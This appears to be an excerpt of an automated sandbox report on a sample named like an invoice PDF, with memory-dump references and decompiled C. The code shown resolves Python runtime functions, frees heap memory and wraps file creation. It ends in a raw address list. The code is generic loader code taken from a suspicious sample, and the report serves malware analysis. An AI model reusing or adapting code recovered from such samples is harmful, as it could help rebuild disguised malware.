                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E01321AED(intOrPtr* _a4) {
                            				signed char _t11;
                            				unsigned int* _t17;
                            				intOrPtr* _t18;
                            
                            				_t18 = _a4;
                            				_t17 = _t18 + 0xc;
                            				_t11 =  *_t17 >> 0xd;
                            				if((_t11 & 0x00000001) != 0) {
                            					_t11 =  *_t17 >> 6;
                            					if((_t11 & 0x00000001) != 0) {
                            						E013209EB( *((intOrPtr*)(_t18 + 4))); // executed
                            						asm("lock and [edi], eax");
                            						 *((intOrPtr*)(_t18 + 4)) = 0;
                            						 *_t18 = 0;
                            						 *((intOrPtr*)(_t18 + 8)) = 0;
                            						return 0;
                            					}
                            				}
                            				return _t11;
                            			}







                            APIs
                            • _free.LIBCMT ref: 01321B0F
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorFreeHeapLast_free
                            • String ID:
                            • API String ID: 1353095263-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0132BA5E(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
                            				void* _t10;
                            
                            				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
                            				return _t10;
                            			}




                            0x0132ba7b
                            0x0132ba82

                            APIs
                            • CreateFileW.KERNELBASE(00000000,00000000,?,0132BDC8,?,?,00000000,?,0132BDC8,00000000,0000000C), ref: 0132BA7B
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            C-Code - Quality: 18%
                            			E013129F0(struct HINSTANCE__* _a4) {
                            				_Unknown_base(*)()* _t2;
                            				_Unknown_base(*)()* _t3;
                            				_Unknown_base(*)()* _t4;
                            				_Unknown_base(*)()* _t5;
                            				_Unknown_base(*)()* _t6;
                            				_Unknown_base(*)()* _t7;
                            				_Unknown_base(*)()* _t8;
                            				_Unknown_base(*)()* _t9;
                            				_Unknown_base(*)()* _t10;
                            				_Unknown_base(*)()* _t11;
                            				_Unknown_base(*)()* _t12;
                            				_Unknown_base(*)()* _t13;
                            				_Unknown_base(*)()* _t14;
                            				_Unknown_base(*)()* _t15;
                            				_Unknown_base(*)()* _t16;
                            				_Unknown_base(*)()* _t17;
                            				_Unknown_base(*)()* _t18;
                            				_Unknown_base(*)()* _t19;
                            				_Unknown_base(*)()* _t20;
                            				_Unknown_base(*)()* _t21;
                            				_Unknown_base(*)()* _t22;
                            				_Unknown_base(*)()* _t23;
                            				_Unknown_base(*)()* _t24;
                            				_Unknown_base(*)()* _t25;
                            				_Unknown_base(*)()* _t26;
                            				_Unknown_base(*)()* _t27;
                            				_Unknown_base(*)()* _t28;
                            				_Unknown_base(*)()* _t29;
                            				_Unknown_base(*)()* _t30;
                            				_Unknown_base(*)()* _t31;
                            				_Unknown_base(*)()* _t32;
                            				_Unknown_base(*)()* _t33;
                            				_Unknown_base(*)()* _t34;
                            				_Unknown_base(*)()* _t35;
                            				_Unknown_base(*)()* _t36;
                            				_Unknown_base(*)()* _t37;
                            				_Unknown_base(*)()* _t38;
                            				_Unknown_base(*)()* _t39;
                            				_Unknown_base(*)()* _t40;
                            				_Unknown_base(*)()* _t41;
                            				_Unknown_base(*)()* _t42;
                            				_Unknown_base(*)()* _t43;
                            				_Unknown_base(*)()* _t44;
                            				_Unknown_base(*)()* _t45;
                            				_Unknown_base(*)()* _t46;
                            				_Unknown_base(*)()* _t47;
                            				_Unknown_base(*)()* _t48;
                            				_Unknown_base(*)()* _t49;
                            				_Unknown_base(*)()* _t50;
                            				_Unknown_base(*)()* _t51;
                            				signed int _t54;
                            				signed int _t56;
                            				signed int _t58;
                            				signed int _t60;
                            				signed int _t62;
                            				signed int _t64;
                            				signed int _t66;
                            				signed int _t68;
                            				signed int _t70;
                            				signed int _t72;
                            				signed int _t74;
                            				signed int _t76;
                            				signed int _t78;
                            				signed int _t80;
                            				signed int _t82;
                            				signed int _t84;
                            				signed int _t86;
                            				signed int _t88;
                            				signed int _t90;
                            				signed int _t92;
                            				signed int _t94;
                            				signed int _t96;
                            				signed int _t98;
                            				signed int _t100;
                            				signed int _t102;
                            				signed int _t104;
                            				signed int _t106;
                            				signed int _t108;
                            				signed int _t110;
                            				signed int _t112;
                            				signed int _t114;
                            				signed int _t116;
                            				signed int _t118;
                            				signed int _t120;
                            				signed int _t122;
                            				signed int _t124;
                            				signed int _t126;
                            				signed int _t128;
                            				signed int _t130;
                            				signed int _t132;
                            				signed int _t134;
                            				signed int _t136;
                            				signed int _t138;
                            				signed int _t140;
                            				signed int _t142;
                            				signed int _t144;
                            				signed int _t146;
                            				signed int _t148;
                            				signed int _t150;
                            				void* _t153;
                            				struct HINSTANCE__* _t155;
                            
                            				_t155 = _a4;
                            				_t2 = GetProcAddress(_t155, "Py_DontWriteBytecodeFlag");
                            				 *0x133c970 = _t2;
                            				_t207 = _t2;
                            				if(_t2 != 0) {
                            					_t3 = GetProcAddress(_t155, "Py_FileSystemDefaultEncoding");
                            					 *0x133c964 = _t3;
                            					__eflags = _t3;
                            					if(__eflags != 0) {
                            						_t4 = GetProcAddress(_t155, "Py_FrozenFlag");
                            						 *0x133c958 = _t4;
                            						__eflags = _t4;
                            						if(__eflags != 0) {
                            							_t5 = GetProcAddress(_t155, "Py_IgnoreEnvironmentFlag");
                            							 *0x133c96c = _t5;
                            							__eflags = _t5;
                            							if(__eflags != 0) {
                            								_t6 = GetProcAddress(_t155, "Py_NoSiteFlag");
                            								 *0x133c95c = _t6;
                            								__eflags = _t6;
                            								if(__eflags != 0) {
                            									_t7 = GetProcAddress(_t155, "Py_NoUserSiteDirectory");
                            									 *0x133c974 = _t7;
                            									__eflags = _t7;
                            									if(__eflags != 0) {
                            										_t8 = GetProcAddress(_t155, "Py_OptimizeFlag");
                            										 *0x133c960 = _t8;
                            										__eflags = _t8;
                            										if(__eflags != 0) {
                            											_t9 = GetProcAddress(_t155, "Py_VerboseFlag");
                            											 *0x133c968 = _t9;
                            											__eflags = _t9;
                            											if(__eflags != 0) {
                            												_t10 = GetProcAddress(_t155, "Py_BuildValue");
                            												 *0x133c9bc = _t10;
                            												__eflags = _t10;
                            												if(__eflags != 0) {
                            													_t11 = GetProcAddress(_t155, "Py_DecRef");
                            													 *0x133c984 = _t11;
                            													__eflags = _t11;
                            													if(__eflags != 0) {
                            														_t12 = GetProcAddress(_t155, "Py_Finalize");
                            														 *0x133c97c = _t12;
                            														__eflags = _t12;
                            														if(__eflags != 0) {
                            															_t13 = GetProcAddress(_t155, "Py_IncRef");
                            															 *0x133c980 = _t13;
                            															__eflags = _t13;
                            															if(__eflags != 0) {
                            																_t14 = GetProcAddress(_t155, "Py_Initialize");
                            																 *0x133c978 = _t14;
                            																__eflags = _t14;
                            																if(__eflags != 0) {
                            																	_t15 = GetProcAddress(_t155, "Py_SetPath");
                            																	 *0x133c990 = _t15;
                            																	__eflags = _t15;
                            																	if(__eflags != 0) {
                            																		_t16 = GetProcAddress(_t155, "Py_GetPath");
                            																		 *0x133c994 = _t16;
                            																		__eflags = _t16;
                            																		if(__eflags != 0) {
                            																			_t17 = GetProcAddress(_t155, "Py_SetProgramName");
                            																			 *0x133c988 = _t17;
                            																			__eflags = _t17;
                            																			if(__eflags != 0) {
                            																				_t18 = GetProcAddress(_t155, "Py_SetPythonHome");
                            																				 *0x133c98c = _t18;
                            																				__eflags = _t18;
                            																				if(__eflags != 0) {
                            																					_t19 = GetProcAddress(_t155, "PyDict_GetItemString");
                            																					 *0x133c9d0 = _t19;
                            																					__eflags = _t19;
                            																					if(__eflags != 0) {
                            																						_t20 = GetProcAddress(_t155, "PyErr_Clear");
                            																						 *0x133c9d4 = _t20;
                            																						__eflags = _t20;
                            																						if(__eflags != 0) {
                            																							_t21 = GetProcAddress(_t155, "PyErr_Occurred");
                            																							 *0x133c9d8 = _t21;
                            																							__eflags = _t21;
                            																							if(__eflags != 0) {
                            																								_t22 = GetProcAddress(_t155, "PyErr_Print");
                            																								 *0x133c9dc = _t22;
                            																								__eflags = _t22;
                            																								if(__eflags != 0) {
                            																									_t23 = GetProcAddress(_t155, "PyErr_Fetch");
                            																									 *0x133ca0c = _t23;
                            																									__eflags = _t23;
                            																									if(__eflags != 0) {
                            																										_t24 = GetProcAddress(_t155, "PyErr_Restore");
                            																										 *0x133ca10 = _t24;
                            																										__eflags = _t24;
                            																										if(__eflags != 0) {
                            																											_t25 = GetProcAddress(_t155, "PyImport_AddModule");
                            																											 *0x133c9ac = _t25;
                            																											__eflags = _t25;
                            																											if(__eflags != 0) {
                            																												_t26 = GetProcAddress(_t155, "PyImport_ExecCodeModule");
                            																												 *0x133c9a4 = _t26;
                            																												__eflags = _t26;
                            																												if(__eflags != 0) {
                            																													_t27 = GetProcAddress(_t155, "PyImport_ImportModule");
                            																													 *0x133c9a8 = _t27;
                            																													__eflags = _t27;
                            																													if(__eflags != 0) {
                            																														_t28 = GetProcAddress(_t155, "PyList_Append");
                            																														 *0x133c9b8 = _t28;
                            																														__eflags = _t28;
                            																														if(__eflags != 0) {
                            																															_t29 = GetProcAddress(_t155, "PyList_New");
                            																															 *0x133c9b4 = _t29;
                            																															__eflags = _t29;
                            																															if(__eflags != 0) {
                            																																_t30 = GetProcAddress(_t155, "PyLong_AsLong");
                            																																 *0x133c9e4 = _t30;
                            																																__eflags = _t30;
                            																																if(__eflags != 0) {
                            																																	_t31 = GetProcAddress(_t155, "PyModule_GetDict");
                            																																	 *0x133c9cc = _t31;
                            																																	__eflags = _t31;
                            																																	if(__eflags != 0) {
                            																																		_t32 = GetProcAddress(_t155, "PyObject_CallFunction");
                            																																		 *0x133c9c4 = _t32;
                            																																		__eflags = _t32;
                            																																		if(__eflags != 0) {
                            																																			_t33 = GetProcAddress(_t155, "PyObject_CallFunctionObjArgs");
                            																																			 *0x133c9c8 = _t33;
                            																																			__eflags = _t33;
                            																																			if(__eflags != 0) {
                            																																				_t34 = GetProcAddress(_t155, "PyObject_SetAttrString");
                            																																				 *0x133c9b0 = _t34;
                            																																				__eflags = _t34;
                            																																				if(__eflags != 0) {
                            																																					_t35 = GetProcAddress(_t155, "PyObject_GetAttrString");
                            																																					 *0x133ca18 = _t35;
                            																																					__eflags = _t35;
                            																																					if(__eflags != 0) {
                            																																						_t36 = GetProcAddress(_t155, "PyObject_Str");
                            																																						 *0x133ca14 = _t36;
                            																																						__eflags = _t36;
                            																																						if(__eflags != 0) {
                            																																							_t37 = GetProcAddress(_t155, "PyRun_SimpleString");
                            																																							 *0x133c9a0 = _t37;
                            																																							__eflags = _t37;
                            																																							if(__eflags != 0) {
                            																																								_t38 = GetProcAddress(_t155, "PySys_AddWarnOption");
                            																																								 *0x133c9e0 = _t38;
                            																																								__eflags = _t38;
                            																																								if(__eflags != 0) {
                            																																									_t39 = GetProcAddress(_t155, "PySys_SetArgvEx");
                            																																									 *0x133c99c = _t39;
                            																																									__eflags = _t39;
                            																																									if(__eflags != 0) {
                            																																										_t40 = GetProcAddress(_t155, "PySys_GetObject");
                            																																										 *0x133c9f4 = _t40;
                            																																										__eflags = _t40;
                            																																										if(__eflags != 0) {
                            																																											_t41 = GetProcAddress(_t155, "PySys_SetObject");
                            																																											 *0x133c9e8 = _t41;
                            																																											__eflags = _t41;
                            																																											if(__eflags != 0) {
                            																																												_t42 = GetProcAddress(_t155, "PySys_SetPath");
                            																																												 *0x133c998 = _t42;
                            																																												__eflags = _t42;
                            																																												if(__eflags != 0) {
                            																																													_t43 = GetProcAddress(_t155, "PyEval_EvalCode");
                            																																													 *0x133ca04 = _t43;
                            																																													__eflags = _t43;
                            																																													if(__eflags != 0) {
                            																																														_t44 = GetProcAddress(_t155, "PyMarshal_ReadObjectFromString");
                            																																														 *0x133ca08 = _t44;
                            																																														__eflags = _t44;
                            																																														if(__eflags != 0) {
                            																																															_t45 = GetProcAddress(_t155, "PyUnicode_FromString");
                            																																															 *0x133c9c0 = _t45;
                            																																															__eflags = _t45;
                            																																															if(__eflags != 0) {
                            																																																_t46 = GetProcAddress(_t155, "Py_DecodeLocale");
                            																																																 *0x133c9ec = _t46;
                            																																																__eflags = _t46;
                            																																																if(__eflags != 0) {
                            																																																	_t47 = GetProcAddress(_t155, "PyMem_RawFree");
                            																																																	 *0x133c9f0 = _t47;
                            																																																	__eflags = _t47;
                            																																																	if(__eflags != 0) {
                            																																																		_t48 = GetProcAddress(_t155, "PyUnicode_FromFormat");
                            																																																		 *0x133c9f8 = _t48;
                            																																																		__eflags = _t48;
                            																																																		if(__eflags != 0) {
                            																																																			_t49 = GetProcAddress(_t155, "PyUnicode_Decode");
                            																																																			 *0x133ca00 = _t49;
                            																																																			__eflags = _t49;
                            																																																			if(__eflags != 0) {
                            																																																				_t50 = GetProcAddress(_t155, "PyUnicode_DecodeFSDefault");
                            																																																				 *0x133c9fc = _t50;
                            																																																				__eflags = _t50;
                            																																																				if(__eflags != 0) {
                            																																																					_t51 = GetProcAddress(_t155, "PyUnicode_AsUTF8");
                            																																																					 *0x133ca1c = _t51;
                            																																																					__eflags = _t51;
                            																																																					if(__eflags != 0) {
                            																																																						__eflags = 0;
                            																																																						return 0;
                            																																																					} else {
                            																																																						_push("Failed to get address for PyUnicode_AsUTF8\n");
                            																																																						_push("GetProcAddress");
                            																																																						_t54 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																																						__eflags = _t54;
                            																																																						return _t54;
                            																																																					}
                            																																																				} else {
                            																																																					_push("Failed to get address for PyUnicode_DecodeFSDefault\n");
                            																																																					_push("GetProcAddress");
                            																																																					_t56 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																																					__eflags = _t56;
                            																																																					return _t56;
                            																																																				}
                            																																																			} else {
                            																																																				_push("Failed to get address for PyUnicode_Decode\n");
                            																																																				_push("GetProcAddress");
                            																																																				_t58 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																																				__eflags = _t58;
                            																																																				return _t58;
                            																																																			}
                            																																																		} else {
                            																																																			_push("Failed to get address for PyUnicode_FromFormat\n");
                            																																																			_push("GetProcAddress");
                            																																																			_t60 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																																			__eflags = _t60;
                            																																																			return _t60;
                            																																																		}
                            																																																	} else {
                            																																																		_push("Failed to get address for PyMem_RawFree\n");
                            																																																		_push("GetProcAddress");
                            																																																		_t62 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																																		__eflags = _t62;
                            																																																		return _t62;
                            																																																	}
                            																																																} else {
                            																																																	_push("Failed to get address for Py_DecodeLocale\n");
                            																																																	_push("GetProcAddress");
                            																																																	_t64 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																																	__eflags = _t64;
                            																																																	return _t64;
                            																																																}
                            																																															} else {
                            																																																_push("Failed to get address for PyUnicode_FromString\n");
                            																																																_push("GetProcAddress");
                            																																																_t66 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																																__eflags = _t66;
                            																																																return _t66;
                            																																															}
                            																																														} else {
                            																																															_push("Failed to get address for PyMarshal_ReadObjectFromString\n");
                            																																															_push("GetProcAddress");
                            																																															_t68 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																															__eflags = _t68;
                            																																															return _t68;
                            																																														}
                            																																													} else {
                            																																														_push("Failed to get address for PyEval_EvalCode\n");
                            																																														_push("GetProcAddress");
                            																																														_t70 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																														__eflags = _t70;
                            																																														return _t70;
                            																																													}
                            																																												} else {
                            																																													_push("Failed to get address for PySys_SetPath\n");
                            																																													_push("GetProcAddress");
                            																																													_t72 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																													__eflags = _t72;
                            																																													return _t72;
                            																																												}
                            																																											} else {
                            																																												_push("Failed to get address for PySys_SetObject\n");
                            																																												_push("GetProcAddress");
                            																																												_t74 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																												__eflags = _t74;
                            																																												return _t74;
                            																																											}
                            																																										} else {
                            																																											_push("Failed to get address for PySys_GetObject\n");
                            																																											_push("GetProcAddress");
                            																																											_t76 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																											__eflags = _t76;
                            																																											return _t76;
                            																																										}
                            																																									} else {
                            																																										_push("Failed to get address for PySys_SetArgvEx\n");
                            																																										_push("GetProcAddress");
                            																																										_t78 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																										__eflags = _t78;
                            																																										return _t78;
                            																																									}
                            																																								} else {
                            																																									_push("Failed to get address for PySys_AddWarnOption\n");
                            																																									_push("GetProcAddress");
                            																																									_t80 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																									__eflags = _t80;
                            																																									return _t80;
                            																																								}
                            																																							} else {
                            																																								_push("Failed to get address for PyRun_SimpleString\n");
                            																																								_push("GetProcAddress");
                            																																								_t82 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																								__eflags = _t82;
                            																																								return _t82;
                            																																							}
                            																																						} else {
                            																																							_push("Failed to get address for PyObject_Str\n");
                            																																							_push("GetProcAddress");
                            																																							_t84 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																							__eflags = _t84;
                            																																							return _t84;
                            																																						}
                            																																					} else {
                            																																						_push("Failed to get address for PyObject_GetAttrString\n");
                            																																						_push("GetProcAddress");
                            																																						_t86 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																						__eflags = _t86;
                            																																						return _t86;
                            																																					}
                            																																				} else {
                            																																					_push("Failed to get address for PyObject_SetAttrString\n");
                            																																					_push("GetProcAddress");
                            																																					_t88 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																					__eflags = _t88;
                            																																					return _t88;
                            																																				}
                            																																			} else {
                            																																				_push("Failed to get address for PyObject_CallFunctionObjArgs\n");
                            																																				_push("GetProcAddress");
                            																																				_t90 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																				__eflags = _t90;
                            																																				return _t90;
                            																																			}
                            																																		} else {
                            																																			_push("Failed to get address for PyObject_CallFunction\n");
                            																																			_push("GetProcAddress");
                            																																			_t92 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																			__eflags = _t92;
                            																																			return _t92;
                            																																		}
                            																																	} else {
                            																																		_push("Failed to get address for PyModule_GetDict\n");
                            																																		_push("GetProcAddress");
                            																																		_t94 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																		__eflags = _t94;
                            																																		return _t94;
                            																																	}
                            																																} else {
                            																																	_push("Failed to get address for PyLong_AsLong\n");
                            																																	_push("GetProcAddress");
                            																																	_t96 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																	__eflags = _t96;
                            																																	return _t96;
                            																																}
                            																															} else {
                            																																_push("Failed to get address for PyList_New\n");
                            																																_push("GetProcAddress");
                            																																_t98 = E01311860(_t153, __eflags) | 0xffffffff;
                            																																__eflags = _t98;
                            																																return _t98;
                            																															}
                            																														} else {
                            																															_push("Failed to get address for PyList_Append\n");
                            																															_push("GetProcAddress");
                            																															_t100 = E01311860(_t153, __eflags) | 0xffffffff;
                            																															__eflags = _t100;
                            																															return _t100;
                            																														}
                            																													} else {
                            																														_push("Failed to get address for PyImport_ImportModule\n");
                            																														_push("GetProcAddress");
                            																														_t102 = E01311860(_t153, __eflags) | 0xffffffff;
                            																														__eflags = _t102;
                            																														return _t102;
                            																													}
                            																												} else {
                            																													_push("Failed to get address for PyImport_ExecCodeModule\n");
                            																													_push("GetProcAddress");
                            																													_t104 = E01311860(_t153, __eflags) | 0xffffffff;
                            																													__eflags = _t104;
                            																													return _t104;
                            																												}
                            																											} else {
                            																												_push("Failed to get address for PyImport_AddModule\n");
                            																												_push("GetProcAddress");
                            																												_t106 = E01311860(_t153, __eflags) | 0xffffffff;
                            																												__eflags = _t106;
                            																												return _t106;
                            																											}
                            																										} else {
                            																											_push("Failed to get address for PyErr_Restore\n");
                            																											_push("GetProcAddress");
                            																											_t108 = E01311860(_t153, __eflags) | 0xffffffff;
                            																											__eflags = _t108;
                            																											return _t108;
                            																										}
                            																									} else {
                            																										_push("Failed to get address for PyErr_Fetch\n");
                            																										_push("GetProcAddress");
                            																										_t110 = E01311860(_t153, __eflags) | 0xffffffff;
                            																										__eflags = _t110;
                            																										return _t110;
                            																									}
                            																								} else {
                            																									_push("Failed to get address for PyErr_Print\n");
                            																									_push("GetProcAddress");
                            																									_t112 = E01311860(_t153, __eflags) | 0xffffffff;
                            																									__eflags = _t112;
                            																									return _t112;
                            																								}
                            																							} else {
                            																								_push("Failed to get address for PyErr_Occurred\n");
                            																								_push("GetProcAddress");
                            																								_t114 = E01311860(_t153, __eflags) | 0xffffffff;
                            																								__eflags = _t114;
                            																								return _t114;
                            																							}
                            																						} else {
                            																							_push("Failed to get address for PyErr_Clear\n");
                            																							_push("GetProcAddress");
                            																							_t116 = E01311860(_t153, __eflags) | 0xffffffff;
                            																							__eflags = _t116;
                            																							return _t116;
                            																						}
                            																					} else {
                            																						_push("Failed to get address for PyDict_GetItemString\n");
                            																						_push("GetProcAddress");
                            																						_t118 = E01311860(_t153, __eflags) | 0xffffffff;
                            																						__eflags = _t118;
                            																						return _t118;
                            																					}
                            																				} else {
                            																					_push("Failed to get address for Py_SetPythonHome\n");
                            																					_push("GetProcAddress");
                            																					_t120 = E01311860(_t153, __eflags) | 0xffffffff;
                            																					__eflags = _t120;
                            																					return _t120;
                            																				}
                            																			} else {
                            																				_push("Failed to get address for Py_SetProgramName\n");
                            																				_push("GetProcAddress");
                            																				_t122 = E01311860(_t153, __eflags) | 0xffffffff;
                            																				__eflags = _t122;
                            																				return _t122;
                            																			}
                            																		} else {
                            																			_push("Failed to get address for Py_GetPath\n");
                            																			_push("GetProcAddress");
                            																			_t124 = E01311860(_t153, __eflags) | 0xffffffff;
                            																			__eflags = _t124;
                            																			return _t124;
                            																		}
                            																	} else {
                            																		_push("Failed to get address for Py_SetPath\n");
                            																		_push("GetProcAddress");
                            																		_t126 = E01311860(_t153, __eflags) | 0xffffffff;
                            																		__eflags = _t126;
                            																		return _t126;
                            																	}
                            																} else {
                            																	_push("Failed to get address for Py_Initialize\n");
                            																	_push("GetProcAddress");
                            																	_t128 = E01311860(_t153, __eflags) | 0xffffffff;
                            																	__eflags = _t128;
                            																	return _t128;
                            																}
                            															} else {
                            																_push("Failed to get address for Py_IncRef\n");
                            																_push("GetProcAddress");
                            																_t130 = E01311860(_t153, __eflags) | 0xffffffff;
                            																__eflags = _t130;
                            																return _t130;
                            															}
                            														} else {
                            															_push("Failed to get address for Py_Finalize\n");
                            															_push("GetProcAddress");
                            															_t132 = E01311860(_t153, __eflags) | 0xffffffff;
                            															__eflags = _t132;
                            															return _t132;
                            														}
                            													} else {
                            														_push("Failed to get address for Py_DecRef\n");
                            														_push("GetProcAddress");
                            														_t134 = E01311860(_t153, __eflags) | 0xffffffff;
                            														__eflags = _t134;
                            														return _t134;
                            													}
                            												} else {
                            													_push("Failed to get address for Py_BuildValue\n");
                            													_push("GetProcAddress");
                            													_t136 = E01311860(_t153, __eflags) | 0xffffffff;
                            													__eflags = _t136;
                            													return _t136;
                            												}
                            											} else {
                            												_push("Failed to get address for Py_VerboseFlag\n");
                            												_push("GetProcAddress");
                            												_t138 = E01311860(_t153, __eflags) | 0xffffffff;
                            												__eflags = _t138;
                            												return _t138;
                            											}
                            										} else {
                            											_push("Failed to get address for Py_OptimizeFlag\n");
                            											_push("GetProcAddress");
                            											_t140 = E01311860(_t153, __eflags) | 0xffffffff;
                            											__eflags = _t140;
                            											return _t140;
                            										}
                            									} else {
                            										_push("Failed to get address for Py_NoUserSiteDirectory\n");
                            										_push("GetProcAddress");
                            										_t142 = E01311860(_t153, __eflags) | 0xffffffff;
                            										__eflags = _t142;
                            										return _t142;
                            									}
                            								} else {
                            									_push("Failed to get address for Py_NoSiteFlag\n");
                            									_push("GetProcAddress");
                            									_t144 = E01311860(_t153, __eflags) | 0xffffffff;
                            									__eflags = _t144;
                            									return _t144;
                            								}
                            							} else {
                            								_push("Failed to get address for Py_IgnoreEnvironmentFlag\n");
                            								_push("GetProcAddress");
                            								_t146 = E01311860(_t153, __eflags) | 0xffffffff;
                            								__eflags = _t146;
                            								return _t146;
                            							}
                            						} else {
                            							_push("Failed to get address for Py_FrozenFlag\n");
                            							_push("GetProcAddress");
                            							_t148 = E01311860(_t153, __eflags) | 0xffffffff;
                            							__eflags = _t148;
                            							return _t148;
                            						}
                            					} else {
                            						_push("Failed to get address for Py_FileSystemDefaultEncoding\n");
                            						_push("GetProcAddress");
                            						_t150 = E01311860(_t153, __eflags) | 0xffffffff;
                            						__eflags = _t150;
                            						return _t150;
                            					}
                            				} else {
                            					_push("Failed to get address for Py_DontWriteBytecodeFlag\n");
                            					_push("GetProcAddress");
                            					return E01311860(_t153, _t207) | 0xffffffff;
                            				}
                            			}
                            0x01312f7b
                            0x01312f7d
                            0x01312f9d
                            0x01312f9f
                            0x01312fa4
                            0x01312fa6
                            0x01312fc6
                            0x01312fc8
                            0x01312fcd
                            0x01312fcf
                            0x01312fef
                            0x01312ff1
                            0x01312ff6
                            0x01312ff8
                            0x01313018
                            0x0131301a
                            0x0131301f
                            0x01313021
                            0x01313041
                            0x01313043
                            0x01313048
                            0x0131304a
                            0x0131306a
                            0x0131306c
                            0x01313071
                            0x01313073
                            0x01313093
                            0x01313095
                            0x0131309a
                            0x0131309c
                            0x013130bc
                            0x013130be
                            0x013130c3
                            0x013130c5
                            0x013130e5
                            0x013130e7
                            0x013130ec
                            0x013130ee
                            0x0131310e
                            0x01313110
                            0x01313115
                            0x01313117
                            0x01313137
                            0x01313139
                            0x0131313e
                            0x01313140
                            0x01313160
                            0x01313162
                            0x01313167
                            0x01313169
                            0x01313189
                            0x0131318b
                            0x01313190
                            0x01313192
                            0x013131b2
                            0x013131b4
                            0x013131b9
                            0x013131bb
                            0x013131db
                            0x013131dd
                            0x013131e2
                            0x013131e4
                            0x013131ff
                            0x01313202
                            0x013131e6
                            0x013131e6
                            0x013131eb
                            0x013131f8
                            0x013131f8
                            0x013131fd
                            0x013131fd
                            0x013131bd
                            0x013131bd
                            0x013131c2
                            0x013131cf
                            0x013131cf
                            0x013131d4
                            0x013131d4
                            0x01313194
                            0x01313194
                            0x01313199
                            0x013131a6
                            0x013131a6
                            0x013131ab
                            0x013131ab
                            0x0131316b
                            0x0131316b
                            0x01313170
                            0x0131317d
                            0x0131317d
                            0x01313182
                            0x01313182
                            0x01313142
                            0x01313142
                            0x01313147
                            0x01313154
                            0x01313154
                            0x01313159
                            0x01313159
                            0x01313119
                            0x01313119
                            0x0131311e
                            0x0131312b
                            0x0131312b
                            0x01313130
                            0x01313130
                            0x013130f0
                            0x013130f0
                            0x013130f5
                            0x01313102
                            0x01313102
                            0x01313107
                            0x01313107
                            0x013130c7
                            0x013130c7
                            0x013130cc
                            0x013130d9
                            0x013130d9
                            0x013130de
                            0x013130de
                            0x0131309e
                            0x0131309e
                            0x013130a3
                            0x013130b0
                            0x013130b0
                            0x013130b5
                            0x013130b5
                            0x01313075
                            0x01313075
                            0x0131307a
                            0x01313087
                            0x01313087
                            0x0131308c
                            0x0131308c
                            0x0131304c
                            0x0131304c
                            0x01313051
                            0x0131305e
                            0x0131305e
                            0x01313063
                            0x01313063
                            0x01313023
                            0x01313023
                            0x01313028
                            0x01313035
                            0x01313035
                            0x0131303a
                            0x0131303a
                            0x01312ffa
                            0x01312ffa
                            0x01312fff
                            0x0131300c
                            0x0131300c
                            0x01313011
                            0x01313011
                            0x01312fd1
                            0x01312fd1
                            0x01312fd6
                            0x01312fe3
                            0x01312fe3
                            0x01312fe8
                            0x01312fe8
                            0x01312fa8
                            0x01312fa8
                            0x01312fad
                            0x01312fba
